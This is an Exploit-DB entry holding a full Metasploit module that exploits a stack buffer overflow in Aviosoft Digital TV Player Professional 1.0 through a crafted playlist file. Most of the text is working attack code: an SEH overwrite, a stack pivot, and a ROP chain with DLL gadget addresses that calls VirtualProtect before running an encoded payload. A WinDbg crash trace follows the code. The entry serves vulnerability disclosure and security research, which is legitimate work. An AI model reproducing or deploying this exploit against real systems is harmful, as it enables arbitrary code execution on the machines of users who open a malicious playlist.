Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)

EDB-ID:

18109

CVE:



Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2011-11-13


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
			'Description'    => %q{
						This module exploits a vulnerability found in Aviosoft Digital TV Player
					Pro version 1.x.  An overflow occurs when the process copies the content of a
					playlist file on to the stack, which may result aribitrary code execution under
					the context of the user.
				},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'modpr0be',  #Initial discovery, poc
					'sinn3r',    #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '77043'],
					['URL', 'http://www.exploit-db.com/exploits/18096/'],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x0a\x1a",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Aviosoft DTV Player 1.0.1.2',
						{
							'Ret'    => 0x6130534a,  #Stack pivot (ADD ESP,800; RET)
							'Offset' => 612,         #Offset to SEH
							'Max'    => 5000         #Max buffer size
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Nov 9 2011",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
				], self.class)
	end

	def junk(n=1)
		return [rand_text_alpha(4).unpack("L")[0]] * n
	end

	def nops(rop=false, n=1)
	 	return rop ? [0x61326003] * n : [0x90909090] * n
	end

	def exploit
		rop = [
			nops(true, 10),  #ROP NOP
			0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
			0x10011108,      #ptr to &VirtualProtect
			0x64010503,      #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
			junk,
			0x6160949f,      #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
			junk(3),
			0x61604218,      #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
			junk(3),
			0x6403d1a6,      #POP EBP # RETN (MediaPlayerCtrl.dll)
			junk(3),
			0x60333560,      #& push esp #  ret 0c (Configuration.dll)
			0x61323EA8,      #POP EAX # RETN (DTVDeviceManager.dll)
			0xA13977DF,      #0x00000343-> ebx
			0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
			0x6163d37b,      #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
			0x61626807,      #XOR EAX,EAX # RETN (EPG.dll)
			0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
			0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
			0xA13974DC,      #0x00000040-> edx
			0x613107fb,      #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
			0x60326803,      #POP ECX # RETN (Configuration.dll)
			0x60350340,      #&Writable location
			0x61329e07,      #POP EDI # RETN (DTVDeviceManager.dll)
			nops(true),      #ROP NOP
			0x60340178,      #POP EAX # RETN
			nops,            #Regular NOPs
			0x60322e02       #PUSH # RETN
		].flatten.pack("V*")

		buf  = ''
		buf << rand_text_alpha(target['Offset']-buf.length)
		buf << [target.ret].pack('V*')
		buf << rand_text_alpha(136)
		buf << rop
		buf << make_nops(32)
		buf << payload.encoded
		buf << rand_text_alpha(target['Max']-buf.length)

		file_create(buf)
	end
end

=begin
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll - 
DTVDeviceManager+534a (6130534a)
Invalid exception stack at 41414141
0:000> !address edi
    00130000 : 00130000 - 00003000
                    Type     00040000 MEM_MAPPED
                    Protect  00000002 PAGE_READONLY
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageIsVAD
0:000> !address esi
    047a0000 : 047a0000 - 0000b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   013c0000
=end